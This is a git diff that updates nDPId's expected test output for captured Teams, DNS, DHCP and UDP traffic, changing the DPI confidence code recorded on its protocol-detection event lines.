+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":46627,"flow_last_seen":47351,"flow_idle_time":200000,"flow_min_l4_payload_len":98,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":47351,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.64.45.227","src_port":23994,"dst_port":5201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":35569,"flow_last_seen":35636,"flow_idle_time":200000,"flow_min_l4_payload_len":98,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":47351,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"79.164.55.123","src_port":23994,"dst_port":5001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"targusdataspeed_false_positives.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":771,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":47351} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 4/4 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 771 bytes +~~ total detected protocols..: 2 +~~ total active/idle flows...: 2/2 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6266469 bytes +~~ total memory freed........: 6266469 bytes +~~ total allocations/frees...: 120888/120888 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 487 chars +~~ json string max len.......: 853 chars +~~ json string avg len.......: 668 chars diff --git a/test/results/teams.pcap.out b/test/results/teams.pcap.out index bd2c1643b..6159981dc 100644 --- a/test/results/teams.pcap.out +++ b/test/results/teams.pcap.out 
@@ -2,7 +2,7 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1587041672419} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1587041672419,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041672419,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES1AAEARZ+TAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABgr52AAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 
-00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} +00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041672611} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041672419,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041673094,"flow_last_seen":1587041673094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041673094,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -20,9 +20,9 @@ 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041675216,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1587041675997,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1587041675997,"pkt":"EBMx8Tl2KDc3AG3ICABFAABPKfkAAP8RDk3AqAEGwKgBAe2NADUAO4czzp0BAAABAAAAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAAQAB"} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041675997,"flow_last_seen":1587041675997,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041675997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1587041676010,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":109,"pkt_l4_len":75,"thread_ts_msec":1587041676010,"pkt":"KDc3AG3IEBMx8Tl2CABFAABfTWlAADkRcM3AqAEBwKgBBgA17Y0ASwAAzp2BgAABAAEAAAAAFHNreXBlZGF0YXByZGNvbG5ldTA0CGNsb3VkYXBwA25ldAAAAQABwAwAAQABAAAACQAENHJNIQ=="} 
-00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041676010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.33"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041676010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"skypedataprdcolneu04.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.33"}} 
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676362,"flow_last_seen":1587041676362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676362,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1587041676362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676362,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex0AbuczSMnAAAAALAC\/\/99oQAAAgQFtAEDAwUBAQgKMISXcQAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1587041676405,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676405,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8L\/5AAGwGm3w0ck0hwKgBBgG77HRJoiConM0jKKASIABWrQAAAgQFoAEDAwgEAggKYQZMqDCEl3E="} 
@@ -31,29 +31,30 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1587041676435,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676435,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOx1AbsuhcJCAAAAALAC\/\/\/XIQAAAgQFtAEDAwUBAQgKMISXugAAAAAEAgAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1587041676448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041676448,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0CixAAHUGQvQ0ccKEwKgBBgG77HWQGjC4LoXCQ4AS\/\/8WpAAAAgQFoAEDAwgBAQQC"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1587041676448,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041676448,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOx1AbsuhcJDkBowuVAQIAA3YwAA"} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676435,"flow_last_seen":1587041676449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041676449,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041676435,"flow_last_seen":1587041676464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6235,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041676464,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} 
-00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676362,"flow_last_seen":1587041676499,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041676499,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01499{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041676362,"flow_last_seen":1587041676545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4377,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1587041676545,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676435,"flow_last_seen":1587041676449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041676449,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01171{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":26,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041676435,"flow_last_seen":1587041676464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6235,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041676464,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041676362,"flow_last_seen":1587041676499,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041676499,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01499{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041676362,"flow_last_seen":1587041676545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4377,"flow_avg_l4_payload_len":547,"midstream":0,"thread_ts_msec":1587041676545,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":64,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041676611} 
00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041676592,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041676612,"flow_last_seen":1587041676612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041676612,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1587041676612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041676612,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR4fAqAEGKH4JBex2AbukS07pAAAAALAC\/\/+ZfQAAAgQFtAEDAwUBAQgKMISYYwAAAAAEAgAA"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1587041676642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041676642,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8LqNAAG0G6+cofgkFwKgBBgG77HaiQxrbpEtO6qASIAC6gQAAAgQFoAEDAwgEAggKVQC94TCEmGM="} 
